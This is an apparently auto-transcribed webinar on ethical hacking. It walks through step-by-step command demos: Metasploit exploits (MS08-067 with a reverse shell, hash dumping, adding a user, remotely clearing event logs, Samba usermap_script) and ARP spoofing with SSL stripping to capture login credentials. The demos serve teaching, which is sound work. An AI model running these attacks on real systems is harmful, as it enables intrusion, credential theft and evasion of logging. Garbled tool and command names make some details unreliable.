Listen-only mode.
Good afternoon, ladies and gentlemen. Welcome to TechGeek webinar series. Today's topic is Next Generation Ethical Hacking, and we have with us today Mr. VP Prabhakaran, Info Security Consultant, Koenig Solutions Limited. Prabhakaran is an information security professional having more than 7 years of experience in information security, VAPT, and web application assessment. He provided consultancy services in both government and private sectors. Prabhakaran is uniquely qualified with his ability to bridge the knowledge and common platform gap between the underground hackers, security researchers, and law enforcement through his various projects. All his efforts are supported and endorsed by administrators and members of various underground hacking groups and communities worldwide. He has become a leading information security professional and renowned ethical hacker. So without any further delay, I hand over the session to Mr. Prabhakaran. We will be taking questions probably for the last 15 or 20 minutes once our speaker is through with his presentation. Prabhakaran, over to you.
Very good afternoon to all of you. My name is Prabhakaran, and as introduction given by TechGeek, I'm working as an information security consultant for Koenig Solution. My objective of today's webinar to just give the overview what exactly the ethical hacking. I'm basically working in various projects for Koenig Solutions, apart from vulnerability assessment, penetration testing, and I also do the security research, latest vulnerabilities, discover. So the model of this particular webinar is basically to just give you the idea that what exactly is ethical hacking, and what are the giant opportunities you have in ethical hacking. And it is not any tough task. If you have a basic knowledge, then you can be an ethical hacker. So, and I need to clear the definition of hacking and ethical hacking in this particular webinar. So, I'm from Koenig Solution, who basically do the world #1 offshore trading provider and world largest trader resource we have, who basically deliver different kind of technologies. Okay, recently we found that there is a different type of cyber attacks we have in this world. Like recently, the Mark Zuckerberg ID compromised. Anyone basically injected some kind of parameters into the wall of Mark. And recently we found the New York Times website is also got hacked by Syrian Electronic Army. I'm not being in a late month, like yesterday, the Adobe network is compromised. The hackers stolen more than 2 million data. Recently, Google Palestine website is also hacked by Syrian hackers. So, what exactly reason why there is a lack of good cybersecurity professionals that make the popular cyber attacks in the world? So, the objective of this particular webinar to tell you that okay, how your knowledge from an ethical hacking point of view helps to reduce the cyber attacks in your organization. These are the big attacks, that is why it has been disclosed in the media. But there are some attacks that happens because of which it not been disclosed, but it will be the big attacks. So there are popular cyber attacks. Also, there are like Apple website, developer website is also hacked. Recently, MTN Mumbai website was hacked by Pakistani hackers. There are always a clashes between Pakistan and India regarding the cyber attacks. Then we have a secretary website of India aggregation has been hacked by the Pakistan. So when we found that there's a different type of attacks happens, so obviously there is a increasing opportunity of ethical hackers in the market. So recently we have evaluated that India faced shortage of cybersecurity professionals. So by 2015 they need more than 4.7 lakhs cybersecurity professionals, but presently they have only we have only 22,000. Recently there is a tie-up between India and Canada. So India will help Canada from a cybersecurity point of view. There are other articles where we have in which the requirement of ethical hackers. Day by day, shortage of security, lack of security, increase the opportunity of ethical hackers. So first of all, I want to change the perception of basically hacker. What exactly a hacker? Hacker is a person who have a good knowledge of computers and network and using that knowledge for offensive and for defensive purpose. I'm repeating, hacker is basically the person who having a good knowledge. Suppose you are a programmer, so you are also a hacker. Like you are a programmer, you can play with the programs. You know the programs. So you play with the programs, you are a master. So master is called a hacker. So hacker means a person who having good knowledge, but using that knowledge for offensive and for defensive purpose is called hacker. So there is two category of basically a hacker. One is called black hat and one is called a white hat hacker. A black hat hacker is a hacker who basically having a good knowledge but using that knowledge for offensive purpose. Suppose I am a black hat hacker. I'm going to hack any website, then I will do blackmailing. Okay, we got your sensitive data. Now, if you don't give me that amount of money, then I can sell this data to your competitors. So what is this? This is called a black hat hacker who basically have an intention to do hacking because of offensive purpose. There is a called white hat hacker. White hat hacker is called an ethical hacker who having a good knowledge. Suppose there is a one company that is called so and so, and they're getting every day a different kind of attacks on their websites. So they just want to know exactly what's happening there. So they want to defend those attacks. So they will going to hire an ethical hacker. Ethical hacker is a person who having a good knowledge and using that knowledge for defensive purpose. Because I am an ethical hacker, I know hacking, I know how hacker perform different kind of parameters to compromise the website. But my duty is to protect. So I'm using that knowledge that how hacker will be hacked, and I'm using my knowledge as security professional and try to defend those kind of attacks. And there's a great demand of ethical hackers, as I discussed previous. Now the question is how to be ethical hacker. Some people, I basically went to so many webinars and they said that you need a good this information, that information. There is no any criteria actually. If you have a 1 year sort of experience in system and network administrator, it means you have a good knowledge of DNS, DHCP, networks, system configurations, and Cisco routers, firewalls. So if you have a good knowledge of this particular type of administration, then you can easily go for any CH course like Office Council or other vendors. And once you did the training, you can be ethical hacker. So from a technical information prospects, you must have a knowledge of Windows, you must have a knowledge of Linux, you must have a knowledge of Apple, iOS, but you also, if you want to be a core hacker, then you should have basic knowledge of languages such as Perl and Python. Reason why, there is another misconception that you can see so many videos in the YouTube like, okay, how to hack Facebook account. So there are so many videos out there. Like you run this tool, type the email ID, and you get a password. That is EXE based tools. So in companies, the organization not prefer to run any kind of EXE. Then how can you perform a security audit? How can you perform ethical hacking? So there are some open source tools which is designed on the based on Perl and Python. So Perl and Python are the languages which basically used by the ethical hacker to develop their own tool and do the security assessment. If you want to be ethical hacker from the if you want to be ethical hacker and you want any kind of certification, because when companies do the interview, they do the recruitments, they basically try to find out, okay, on the basis of which criteria you are ethical hacker. So there is a one certification which is globally recognized. That's called CEH, which is from the EC Council. So the latest version of CEH is called CEH V8. So once you do that certification, like you can go for any company as an ethical hacker, you will get a job, because you need a certificate for ethical hacker. But if you go international, there is no need of any kind of certification, telling you frankly, because they're basically looking for a knowledge. If you have a good knowledge, then they can recruit you easily. But in India, there are some companies who basically require a certification. But this has to be changed. We have to change the conception, because, like, suppose I did CEH, okay, but I don't have a good knowledge, but I have CEH. So if I show the certificate, I get a job. So we are planning that. In India, there are some companies who are basically planning the recruitment process, changing the recruitment process of ethical hacker. Instead of checking the certification, they're basically checking the knowledge. What knowledge they have as an ethical hacker. But if you're talking about the prerequisite as a basic certification, you must require a CEH from EC Council. Now the question is why ethical hacking is necessary. This is a small article which has been used from a CEA. That is a very good article. That is I prefer to share this same thing in this particular webinar. When we talk about the ethical hacking, is it necessary because it allows the countering of attacks from malicious hacker by anticipating method they can use to break into the system. All basically the thing is that ethical hacking, if I'm an ethical hacker, my duty is basically used to protect my network from being attacked, from being hacked. So the question is reason why organization recruits ethical hacker. When we talk about there are some different kind of reasons why organization hire ethical hacker or recruits the ethical hackers, because they want to prevent hackers from gaining access to the information breaches, fight against terrorism and national security breaches, to build a system that avoid hacker from penetrating. We'll discuss later on what do you mean by penetrating, and to test if organization security settings are in fact secure or not. So suppose my CEO or my company member will telling me, okay, Prabhakaran, please do the needful and check whether my website is secure or not. So I am an ethical hacker, I am doing a security assessment from a hacker point of view. So that is why they were going to hire me as an ethical hacker. But another thing is that ethical hacker, once he got hired by the company, they need to give answer of some questions like what can the intruder see on the target system? It means what can the hacker see on the target system? What can a hacker do with that information? Like, Prab, can you please tell me, like my boss telling me, okay, Prab, can you please tell me, like, can you please tell me, is it my website is secure? Okay, if you find any kind of information, can that information be used by my competitors? And I want to also check that if you do any kind of attack, I want to check my security professionals are able to track that particular attack or not. So there are some questions of which I need to give answer once I got recruited by the company. Apart from that, then how much effort, time and money is required to obtain that particular protection? Does that information security measure are in a compliance to industry and legal standards? So there are some reasons why ethical hacking is necessary in the organization. Before going to start about this particular webinar, I need to go through the basic terminologies used in ethical hacking. First is called exploit. Now, what do you mean by exploit? Suppose if I want to do any kind of attack on my friend, so I need to use gun, I need to use knife, I need to use any kind of stone or wood to hit them badly. Same like in a hacking, when any hacker want to hack any system, he basically create a script, a malicious script. That script is called an exploit. He basically create an exploit that basically used to send on the target system. An exploit always designed on the based on a loophole in that particular target. Suppose I have, like, my friend have a problem in his stomach, so his weakness is his stomach. So I'm going to create a medicine in a such a way that once he take a medicine, he will die automatically, because that medicine directly react his stomach and he die. So reason why I need to develop an exploit according to the loophole which is available on the target. If loophole is not there, you cannot able to send any kind of exploits against that particular loophole. Now the next terminology is called penetration testing. Penetration testing means suppose my website is secure. My company boss is saying that my website is secure. I am saying that we can do penetration testing of the website and try to find out whether is there any loophole in the website or not. So that method is called penetration testing. It means evaluating the security of specific object which is available in the network from a hacker's point of view and try to rectify that particular issue. So that is called penetration testing. Next is called vulnerability. When we talk about vulnerabilities, that is called a loophole which is targeted on that particular system. Now there are some terminologies used in security such as authentication, authorization and integrity. So when we talk about the authentication, now how can I give the best example of authentication? Suppose you have a system which is protected with the password. You need to give the password before you want to access to your system. So what is that? That's called authentication. Authentication means it confirming that you are the real identity basically you are the real person of that particular object. You are the owner of that particular object, but you need to prove that yes, I am the real person of this particular object. So by giving a password in an ATM, you basically submit your ATM card and then you type a password. That is also authentication. Once you gain, suppose you type the password, now what next? You gain access to the system. Now the thing is that what level of access you have for your computer. You have access to C drive, or you have an access of D drive, or you have access of E drive, or suppose you have only a D and E access. You cannot access to the C drive. So after authentication, the authorization has been decided. So that is called the process of granting or denying access. So authorization basically means like a level of access which is identified to the user so that they can access, they can perform different kind of operation. Now the next is called integrity. When we talk about integrity means maintain the consistency of the data. Suppose my friend wants some data. I send some data to my friend. So how my friend find out that okay, he received a data without any modification? So by implementing the integrity, that is called a fixed value of hash with the data, which cannot be changed. If data will change, the value automatically change. So through this way, he can identify the consistency of the data. So this is the part of the fundamental to security. Now the next phase is hacker phase. When we talk about hacker phase, like how hacker hack the systems. So he follow one methodology. By that methodology, he trying to perform a different kind of parameters that basically gain access to the system. So he basically follow the standard. By following that particular standard, he trying to gain access of the system. So first process is called reconnaissance. Then he do scanning. Then he do gaining access. Then he do maintaining access, and then he do clearing track. I'm repeating. When we talk about reconnaissance and scanning, reconnaissance scanning play a very important role. Reason why it have its own significance in the initial phase. Suppose I am a hacker. Okay, I want to hack Facebook. So how can I hack Facebook? So I need to follow a standard. First I need to do reconnaissance, then I will do scanning, then I will do gaining access, then I will do maintaining access, and then I will do clearing tracks. So first phase, that is called reconnaissance. Now when we talk about reconnaissance means, so when we discuss about reconnaissance having its own important role. It is a phase in which attacker trying to gather initial information about the target. I'm repeating. Reconnaissance, it is a phase in which attacker trying to gather initial information about target. Suppose I want to hack Facebook. If I want to hack Facebook, or if I want to hack any other website, so I need to collect a basic information about the Facebook or about the other basically servers. So now I need to gather information. The way of gathering information is two-way, either active or either passive. Active means directly interacting with the target, like directly interacting with the customer care of Facebook and trying to find out the Facebook history. That is called active reconnaissance, in which you have interaction directly with the target. But when we talk about a passive reconnaissance means indirectly, you're not approaching directly Facebook. Indirectly, you're gathering information about the Facebook. So that is called the passive reconnaissance. Hope is it clear to everyone? What are the information we can gather in a reconnaissance? Like domain name, network block, employee information, IP address information, internal URLs, collect geographical information and DNS information. So these are the information we need to gather in a reconnaissance phase. So suppose domain name facebook.com. Suppose its a domain name is facebook.com. Now, where Facebook has been registered, who is basically the owner, who is basically a CEO, where it is located, that is a part of domain name. So in domain name information gathering, we try to gather every information about related to the domain. Now the second is called, suppose so and so website is basically allocated on this particular IP. The IP is 10.0.0.1. Now I need to find out 10.0.0.1 is a part of which network range? It's a part of which organization? So that is a part of network block. Now the third is called employee information. I need to find out what are how many employees, their records from the Google. So that is called employee information. Then IP address information. I need to find out is any other URL of the Facebook or other so and so website available in the Google or not. Then we need to find out the geographical information about Facebook. I need to find out DNS information about the Facebook. So there are some practices we have to follow in reconnaissance. So for that, I'm going to use our machine that is called a backtrack. This is the backtrack. Now what exactly a backtrack? Backtrack is a famous operating system which is based on Ubuntu, used by ethical hackers, penetration testers or hackers for thus penetration testing. So I want to introduce a backtrack because I already commit that it will be with a live demo, this webinar with a live demo. So I want to show you a live demo of backtrack. If you see my screen, this is the Windows system. This is a backtrack machine. This is basically a backtrack machine that I'm going to use. And the third machine is called Linux. People say that Linux is secure, no one can hack. So in this particular webinar, if we get a time, we can show you how to hack Linux also. So first I will go to backtrack. This is the backtrack system. If you want to know more about the backtrack, then you can go to the website security.coininghappensolution.com. I will share all the websites in the end of the session. From here you can get all more details about the backtrack. So this is the backtrack machine. I'm going to backtrack, information gathering, network analysis, DNS, and this is called a Multigo. Once you open a Multigo, you will get this kind of link. Once you open a Multigo, you will get this kind of link. I will go here and just type, I will just move this domain to here and type, press F2 and type certified hacker.com. So certifiedhacker.com is my target, suppose. So I want to gather information about his domain. So I'm going to right click, run transform. This is called all transform. Once you click all transform, it will ask for that do you want to perform all the transforms? Yes. If you see this particular certifiedhacker.com, it tell you about, okay, certifiedhacker.com, the phone numbers, the person who is basically, double click on that, the full name, who basically CEO or the owner of that particular domain. Then these are the DNS records. This is a mail server. This is a DNS record, support, webmail, admin, FTP server, where it is relocated, United States, US. So this is the good tool because it's a next generation ethical hacking. Don't believe on any exe, it's open source tool. It's called Multigo. The name of the tool is called Multigo. It's an advanced tool which is basically used for information gathering. So this is the Multigo that you can use. And so certifiedhacker.com, we got so many details of certifiedhacker.com. You can see. Hope is it clear to everyone? Now I need to find out the IP address of certifiedhacker.com. I'm going to ping. Ping is the best tool. Certifiedhacker.com. We got 202.75.54.101. So this is the IP 202.75.54.101, which is assigned on the certifiedhacker.com. Guys, I share the backtrack machine here. Reason why backtrack is now the popular operating system, which is mostly used by all the ethical hackers. So I will just copy that, go to the new terminal and type who is space and paste 202.75.54.101. Once I hit enter, I can see the details. Two 202.75.32.0, 202.75.254. So this particular IP is a part of this network. So we got the network range. Where it is registered, these are the details of the registration. Person name is this, app name is this, details is complete with this, information is with this. So this is the complete information I got. Countries and value for Malaysia. So we got to know this IP is registered from the Malaysia. Apart from that, there's a one website also that you can use. Whois.sc. Whois.sc. You can type certifiedhacker.com, enter. This is called the site profile. We can see the site profile. Registration under 2 domain. Server statistics 202.75.54.101. Which kind of operating system they're running? IIS 6.0. So we also got to know that the web server is running IIS 6.0. There's another technique that you can use to gather which kind of operating system they are running. That website is called search TNS netcraft.com. You can type certified hacker.com. Click on the site report. You can see here the certifiedhacker.com. IP address is this, running Windows Server 2003, IIS 6.0, the complete detail. Okay, so these are the part of reconnaissance that we have discussed till now. So we got the IP, we got the network range, we got the basic information. Now there is another website that is called, I need to find out now suppose I got the target name. Now I want to find out the list of employees who are working in that particular organization. So this is the best tool I can use, that's called a harvester. Now how to get the harvester? CD pen test enumeration the harvester. The harvester.py, once you type the harvester.py, you can hit enter, you can get the help command. So the harvester.py -d, suppose I am looking for the record of Microsoft, no, Facebook.com. I'm looking for an employee information of Facebook.com. Then I will type L stands for listing. Listing meaning 500 -b. Where will be the source? Source will be Google. We'll check. Do we get any kind of information about Facebook employees? We got their internal servers also. We got only one, that's called friendship@facebook.com. We tried to find out some other domain. Suppose I'm looking for Microsoft.com. It's taking some time because you're trying to fetch all the results. Yes, we got 4 people's employee information because I cannot share all. These are the internal servers of Microsoft. So we got the email address contact satnams@microsoft.com. I can use any other domain, IBM.com or any domain. Then you can go to the website pipl.com. The basically best website for people search engine, people.com. Satnams, thing about this particular website, it is connected with all the social networking sites, Facebook, LinkedIn, other social sites. So he got the, okay, Satnam at the microsoftmail.com, Satnam Singh, who basically Microsoft Research. So by this way, so this is a good website, it's called people.com. Okay, hope you enjoyed the first part of reconnaissance. First phase of ethical hacking, that's called reconnaissance. There are so many other parameters you can use: DNS information, collect geographical information, internal URLs, employee information. So these are the informations you can get in the reconnaissance. Now the next part, once you get the IP address, once you get the network block, what the next we can do? The next is called the scanning phase. In scanning phase, you try to find out the live host. We got the network range, suppose. So once you got the network range, you need to scan the entire range and you try to find out how many IPs are live. Then once you find that, okay, 3 or 4 systems are live, then you need to scan each and every system on the point of view of the ports. Then what are the ports are open on the each and every system, so that we can get the idea. And last, that is called vulnerability. So scanning is basically a process of identifying live IPs from the range, open ports, and vulnerabilities. So when we talk about scanning, we have 3 types of scanning: network scanning, port scanning, and vulnerability scanning. So network scan identify live host, and port scanning will do together with the help of one tool that is called Nmap. The advanced version of Nmap is called Zenmap. This is called Zenmap. Suppose I need to scan this is machine. CMD. So the IP address of this machine is 5.244. 192.168.5.244, and I'm going to do scanning. This is the best tool. How to open this tool? Simply, you need to type Zenmap. Once you open Zenmap, you will open this tool. It will take some time. It is the best tool for network and port scanning. So till the time you're trying to find out the open ports and tell us about open ports, we can do the vulnerability scanning. For vulnerability scanning, we have a best tool that is called Nessus. Nessus is basically the tool and try to find out the loopholes and the vulnerabilities on the target machine. So how can we do the vulnerability assessment on the target machine? Go to Backtrack, vulnerability assessment, vulnerability scanner, Nessus, start. Once you start Nessus, you need to go to Backtrack, Internet Explorer, Firefox web browser. Once you open Firefox web browser, you need to type the command http localhost 8834. I have created already a user, so I'm going to type A123. It is the best tool which is mostly used by all the penetration testers and hackers in the organization for the vulnerability assessment. Now, what do you do? Vulnerability assessment, I already repeat. Vulnerability assessment is called a process of identifying the vulnerabilities on the target systems. So by finding the vulnerabilities, you can get the idea what are the loopholes you have, what are the loopholes can be avoidable, because it gives a complete solution. Sorry. When you go to scan, there's an option called scan. This is called add. You need to add your name, like suppose I want to scan my website. So I will type website scan. Then there's an option called run now. You need to specify the policy. If you're doing web scan, then use web application test. If you want to external network scan, then select external network scan. I'm going to internal network scan, and I'm going to type the URL. The URL is 192.168.5.244. This is my target, 192.168.5.244. Then there's a corner launch scan. Once you launch the scan, then go to report. You can see the report. Suppose the report can you see in this format. 192.165.207. Total is 122 vulnerability, out of which 12 is higher and 77 is lower. Double click on that. This is called a download report as a HTML. Submit. See, you can see the complete information. So no need of anyone. If you have a basic knowledge of computer and how to use Google, you can do all these practicals, because these practicals are available on the website. I'm going to share the link on the end of the session. So you can see the complete details, what are the vulnerabilities, complete description of that, solutions, everything there. Okay, so this is called analysis, by which we did the vulnerability scanning. I'm going to close this console. Yes, we did the port scanning also before the vulnerability scanning. So he found these ports are open on the systems. OS details, Windows XP, MAC address, device name, TCP sequence ID, difficulty, ICMP, Windows Server 2003, host, script, everything, every information he gathered, complete information. He telling that these ports are open. The green highlighted that these ports are open. Then, so this is the best tool. He type the IP and do the scanning. That is called a Zen. I'm going to close all the consoles. So we did with the scanning. We discussed about the backtrack. Now in backtrack we have one more tool that is called a Metasploit. Metasploit is a big project basically used for providing information about security vulnerabilities and penetration testing and idea signature development. They have their own framework which basically used to develop exploits and execute those exploits against the remote system. I'm repeating. See, if I want to hack any system, or if I want to perform any kind of penetration testing, against the target system, the Metasploit is always the best choice for hackers, ethical hackers, penetration testers. So how can you use a Metasploit? I'm going to help you in this case. Go to the backtrack machine. There is called exploitation tool, network exploitation, Metasploit framework, MSF console. It will take some time. So it takes some time, then I can continue the slide. So after scanning, what is the next thing we need to do? Gaining access, it means gain access. Maintaining access, once you gain access, you have to maintain the access in your, on that system. And last is called the clearing threads. Always have one thing, whenever hacker hack any system, he always try to clear all the logs. Reason why no one can trace them back, and in the future he can hack again that particular system. Reason why if you don't remove the logs, the security administrator or administrator of that system, he can check the log and he try to find out how hacker gain access to his network, and he will going to patch all those areas. That is why he will try to delete all the logs so that no information will be available for the administrator to find out how the attack has been take place. So it is always a methodology to perform system hacking by following this particular process. Once you open the Metasploit, it will be open. Type the command use exploit Windows. I'm already doing a Metasploit from last 7 years, so I'm already have hands on. Make sure, I hope so, that in the future you also be a master of this Metasploit if you continuously watching this video and do the practical. Use exploit Windows SMB MS08067 API. This is the name of the exploit I have selected. Then hit enter. Where I need to send this exploit? Set. No, first I need to select the payload. Set payload. Now what is this payload? Every exploit have a different kind of payloads. Payload is called a group of code that we're going to execute. Set space payload. Windows interpreter reverse TCP. Once you select a payload, then what is next? Where we need to execute this payload? Set our host. We need to type the IP address of the system on which I need to execute. So my system is Windows Server 2003 192.168.5.244. So 192.168.5.244. Enter. So this is the IP. Now the question is where I want the entire information of the system. So set localhost. Here I need to mention my IP. One 192.168.5.159. Then I will type the command exploit get. Once you get metadata, it means you executed that particular payload on the kernel of the target system, and he gives you the reverse connection. It means someone, when I want to access any system, so I will do the request. But in this case, I have not did any kind of request. He reverse give me the connection. So what the next I need to type? Hash dump. So it tells me the hash value. So this is the encrypted value of the password I got. Now I want to jump into the system. So I will type the command shell. If I type the command shell, I directly access and get into that particular system. I'll check the IP. I can create any user, let user a/add. I can do anything there. Once I did exit, so I did anything on that particular system, and then I will type exit. I will jump again to the metadata. I will go and I will check all commands, administrator tools, and event viewer. This is called system. I got so many logs. Security, so many logs. Application, so many logs. So I want to delete these logs. So I will type a command clear rev. This is the command to clear the logs remotely. So now I will check security, nothing, system, nothing, application, nothing. Hope is it clear to everyone. So this is the thing that is called a system hacking with Metasploit. Same you can do for Linux also. People think that Linux is very secure. No, there is no more eyes on the Linux. That is why Linux is still, people think it's secure, but it is also vulnerable than Windows. So there one exploit I am going to use into that. Use auxiliary scanner SMB version. Set rhost 192.168. The IP address is 5.207. 5.207. Then set lhost. My IP is 5.192.168.5.159. And exploit. We found they are running Unix Samba 3.0. Now I will type another command that is called use exploit multi Samba user map script. Set rhost 192.168.5.207. Set lhost 192.168.5.159. Exploit. Yes, bingo, I got the complete access of that system. If config, these are the details. Here, so I am jumped into this kernel. dir, ls, and everything. So if people saying their Linux is secure, you can show this practical and how easy to hack Linux machines. So it's only possible because of Metasploit. Now, I also discussed in my webinar that how online banking and social networks are vulnerable. We have our US with us, so I'm trying to do this practical also. Okay, now it is only possible because of sniffing. Now, what do you mean by sniffing? Suppose you trying to access your online website over wireless or in a wire network in your business organization. Someone in the middle is trying to sniff your all the credentials which you submitting to the website. So what is that? That is called sniffing. So with that of sniffing and ARP poisoning, it is possible to obtain your password remotely from any system. Now what do you mean by this? I'm going to explaining you in a proper manner. Suppose this is a switch, this is Alice, this is attacker, and this is Bob. So Bob sending any data to Alice. So attacker perform the ARP poisoning on this system by replacing his IP with his MAC address on his table. It is a very advanced technique. For this, you should have a good knowledge of network administration. So what that technique is called ARP poisoning. So ARP poisoning is a kind of technique in which attacker trying to poison the ARP table of computer of which he or she want to deviate the traffic from his computer to obtain his credentials and same passwords. Suppose you went to facebook.com, you typed the username and password, but you are not aware that your password has been obtained in the network by the system. So you just think like, okay, he is the Bob, he trying to access Facebook. So the attacker, so the Bob data is going through the Alice machine. So what the attacker did, attacker used his MAC address with his IP, so attacker is basically used Alice MAC with attacker IP and he enters that information is the ARP table. And what happens, and once the ARP table accept that entry, then the data which is going to the switch, once the data is going to the switch, once data reaches switch, instead of sending that data by switch to the Alice, is sent that data to attacker. Okay, so attacker in the middle can obtain that particular credentials. How this attack is possible, I want to show you. In this case, I'm going to use one technique that is called SSL stripping. That basically a technique used to SSL technique is basically used to strip the SSL traffic. Now, how is possible? So I'm going to exit everything. Okay, the first command, I'm going to terminal and I'm going to type the command. I have a basic command with me, echo 1, enter. Then I need to read out the traffic, copy, then ARP spoof, because see, this is the ARP spoof minus I, its IP address is 5.159. So ARP spoof minus I ETH 3 1.20. So here I need to define the IP address of the victim. So my victim is this. Its IP address is 5.244. So 5.244 and my gateway is 5.1. Okay, ETSD. So I start poisoning. I'm going to the next machine, CD and test web SSL strip. Then I will type the command python SSL strip .py minus L 1000. So now I'm going to open Internet Explorer and type facebook.com I will type prabhakaran@ll.com money, get the password and submit. So if I go there and close this one and type cat SSStrip.log, you can see my email and you can see my password. The reason what this tool do, this tool basically redirect the HTTPS traffic to HTTP, and on which you can, and you don't get any kind of error. Here I can get the error, reason why I'm using the updated Internet Explorer, but it's still working in Google Chrome and today's Mozilla. You type the email address and user and password, submit, you will get completely blank and you can see the session is HTTP. So there are some countermeasures you need to take. Reason why, if I go to CMD, you can check the ARC table. 5.1 and 5.100 both have a different MAC address, but still then you can see everything is possible. You type the username password, I got the password. So there are some countermeasures you need to take, like verify data is encrypted or not. Email is not encrypted. Check whether the website will basically provide email services is sending data in an email. Beware of phishing scams. No one is providing free tickets, so please don't click on such links. It will reset your passwords, hack your passwords. Use a safe passwords. You use caution when accepting or agreeing to prompt, because sometimes Java errors will come that you need to check. So before click any option, check that option. Be caution whenever you log into the business network, wireless network, and friend out. And one more thing, if you are very addicted for the Facebook and you are very addicted for the Facebook and you want to access the Facebook in airport also, you can get plenty amount of free internet services. But out of it, some are the hackers who basically start the free wireless services in the wireless airport network, and the same way, I show you the practical how to opt in password, they can do the same thing. So be aware of those around you, update the internet browser plugins, secure safe passwords, always delete your cookies and histories. And if you want to know how your computer has been hacked, or how do I know if my computer has been hacked, so there are some points you need to take care, like new programs must be installed, computer passwords have changed, email spam being sent, increased network activities, unknown program wanting access, security programs uninstalled, computer doing things by itself, internet browser, home page change or new toolbar. So if these activity happens in your system, make sure that your system is compromised. So the practical which I show you about Facebook, the same, it's applicable in all the banking sites. Still it's vulnerable. Any bank, Standard Chartered, Citi, ICICI, because I cannot do this practical because it's a ISO company, we cannot do any practical against this, but this same practical happens in applicable in all the banking sites, and I did all kind of testing on the websites, and I found this is the common vulnerability which is applicable in all the websites. So this is for today. Hope you enjoyed my session, and this is all about the today's agenda that I want to discuss, and I want to change the concept of what exactly is ethical hacking and how can you do that. Thank you guys. Please let me know if you have any inquiry you have.
Thank you so much, Prabhakaran. I have already sent you a couple of questions. In the meanwhile, one of our attendees, his name is Kushal Chaudhary, he has requested you to talk a little bit about man-in-the-middle attack.
Okay. Actually, sniffing is another kind of man-in-the-middle attack. Because of that man-in-the-middle attack, this attack happens. Because man-in-the-middle attack is only because of lack of good knowledge of security. Like for example, R poisoning is always a reason of man-in-the-middle attack. And if you want to protect your systems from man-in-the-middle attack, then you can basically use a static ARP entry. I will show you the example of that also. Just wait. If you see this particular diagram, man-in-the-middle, another term, is also called as sniffing. Sniffing is a kind of technique in which attacker is trying to obtain the data which is travel, which is sent over the network. So it is only possible by, suppose he's the attacker, he basically spoofed the IP address. He spoofed the IP address of Alice. So if he spoofed the IP address of Alice and he sent any data to Bob, he can send any data to Bob easily, because Bob believed that data is coming from the Alice, but actually the data is coming from the attacker. So this is one of the best example. The R poisoning is one of the best example which can be a part of man-in-the-middle attack. For more details, because it is a big topic, it will take more time to explain because it includes session hijacking. But moral of the story is MITM is an attack in which attacker is in the middle and he trying to do all kind of possibility like IT spoofing, MAC spoofing, R poisoning to deviate the traffic from its own computer and try to capture all the passwords. Is it clear? Hello?
Thank you for answering that question. In fact, somebody wanted to know a little bit about request you to go through the questions, Prabhakaran, in your questions box.
Okay, sure.
We have around 5 minutes. See how many questions you can take. Yeah.
The first one is the question that's called how can one ensure the security is, how can one ensure that security is ensured when any activity more is when they go for a public mode of cloud services. See, when we talk about cloud is a big thing. Obviously, it is difficult to manage the security, but it's my advice. There's a one thing that you can implement, that whatever the data is going, you can monitoring that data with the help of Wireshark. Wireshark is the best tool that you can use to monitor the packets whichever sending over the cloud or whatever the access from the cloud. And there's different kind of cloud-based IDS available by which you can trace the intrusions and protect your data from the cloud. For more information that you can post in the discussion, I will revert there with the proper way. Okay, the another question is that what are the tools that one need to look into both static and dynamic code analysis? Does backtrack required? What are the tools that one need to look into for both static and dynamic code analysis? There's IDA Pro that you can use, which basically used for reverse engineering, by which you can analyze the code of static and dynamic, which is available in the application. Does backtrack require any specific environment for installation? No need of that. It's a live CD, live ISO. You can download from Google, and you can run in a VMware. How to check whether a port is open or not? If you want to check, the command is netstate -an, NET space -an, by which you can check whether the ports are open on your system, or you can use TCP Viewer, is a tool by which you can monitor what are the ports is open and what are the malicious ports are open there. Please guide us on vulnerability research and its scope. When you talk about vulnerability research and scope, this is one website that is called, if you see my screen, security.coininghappensolutions.com, you can get all the latest security articles. Apart from that, there is another one that is called prub9.com. So you can go to the latest security research. I'm always do the latest security research, and you can see all the latest security research from there. And the securityfocus.com, securitysophos.com, there are some websites, and you can use. So we have security.coininghappensolutions.com, my website is prub9.com, where you can learn security updates, where you can get all the videos, where you can get backtrack tutorials. Okay. What about 2008 R2 with the firewall enable? It's possible. I did research. Actually, my target audience is normal. That is why I use a basic system. But yes, we have expert for 2008. What is MAC address? MAC address is the physical address. How to exploit the source code? It's easy, buddy. With the help of Python or Perl tool, you can exploit the source code also. Is the process required administrative privilege? No, there is no required administrative privilege when you do the Metasploit practical. If the company has more than 2,000 computers, what will the process? What will process them? I'm not getting a question, Himanshu. How to prevent data sharing over a switch? Easily by monitoring the MAC. Can you tell how to secure banking password? Yes, this is one of the good questions. If you want to secure, the thing is that you can check at HTTPS whenever you initiate a connection, and please change your passwords and use a virtual keyboards during a time of banking sites. Yeah, virtual keyboards are secure. I'm going to the Backtrack website, which version should be downloaded to practice the concept. If you want to, use Kali or Backtrack 5 RStudy. How to check the loopholes of a system and to secure Facebook, any other online. If you want to check, there's a tool that is called Nessus, I told you. Apart from that, whenever you open any session, check the HTTPS or not. Check whether it is on HTTP or HTTP. If it is on HTTPS, then your session is secure. Anything else?
Yes, there are quite a few, but we are running out of time today. So
we can
I
discuss on
can
the
request,
discussion board.
Sure, either on the discussion board or I can take the questions from the attendees offline and pass on the relevant ones to you.
Sure. And one thing is that they can go through the security.quenic or prabna.com. These are the websites where they can post their comment. We can share the discussion there. Not to worry. Every solution is available on these two websites.
Okay. All right. Thank you so much, Prabhakaran, for the presentation. It was more of a demo, live demo that you gave today.
Yes.
I'm hoping that it was helpful for all our attendees today. And as I said, there are around 30 odd questions which you couldn't answer. So we can easily take them up offline and pass on the questions to you. The recording of today's session will be available on techgeek.com tomorrow. So those who joined the session a little later, request you all to come on techgeek.com and go to the session recorded version on the site. Once again, thank you everyone for all your support. Thank you so much, Prabhakaran. It was a pleasure having you on board.
My pleasure. Thank you.
Thank you.
Have a nice day.